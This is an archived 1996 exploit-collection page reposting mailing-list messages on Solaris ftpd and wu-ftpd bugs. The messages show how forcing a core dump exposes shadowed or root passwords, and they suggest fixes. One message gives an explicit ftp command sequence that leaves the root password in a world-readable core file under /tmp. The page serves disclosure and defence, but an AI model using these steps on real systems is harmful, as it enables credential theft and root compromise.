Solaris ftpd (as well as others) can be made to core dump and divulge shadowed passwords
Can obtained crypt()ed root password
Solaris (at least 2.5) and others including wu.ftpd. If enclosed doesn't work, try killing the process yourself.
15 October 1996
From: Martin Rex (firstname.lastname@example.org)
Date: Tue, 15 Oct 1996 18:14:08 -0400
James Poland 6-5251 wrote:
> On Solaris 2.5.1, the core file contains only the user's password in
> cleartext. How hard is it to crash someone else's ftp session?
Killing from the command line doesn't seem to work, but:
logon via ftp with your regular user/password,
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv
voila, root password in world readable core dump under /tmp
PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
so the seem to have used the proposed fix
Checking for "pw != NULL"
So this proposal was simple and obvious ... and incomplete. :)
Addendum: Other ftpd bugs:
FromVadim Kolontsov (email@example.com)
Date: Tue, 15 Oct 1996 08:41:40 +0300
wuftpd can create core dump in two following situation too (yes, dump
will contain some subset of shadowed passwords):
1) "pasv" given when user not logged in
(caused by error in passive())
2) more than 100 arguments to any executable command (for example, "list")
(caused by error in ftpd_popen())
First error presents in almost all version of bsd's ftpd, wu-ftpd and
derived. Second error presents in all versions of bsd's ftpd, wu-ftpd and
derived (as far as I know).
Bugfixes are simple. Checking for "pw != NULL" in first case, and
checking for "argc < 100" in another one (see sources).
Best regards, Vadim.
P.S. By the way, who knows e-mail of wu-ftpd developer? Mail me, pls...
Vadim Kolontsov SysAdm/Programmer
Tver Regional Center of New Information Technologies Networks Lab
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces: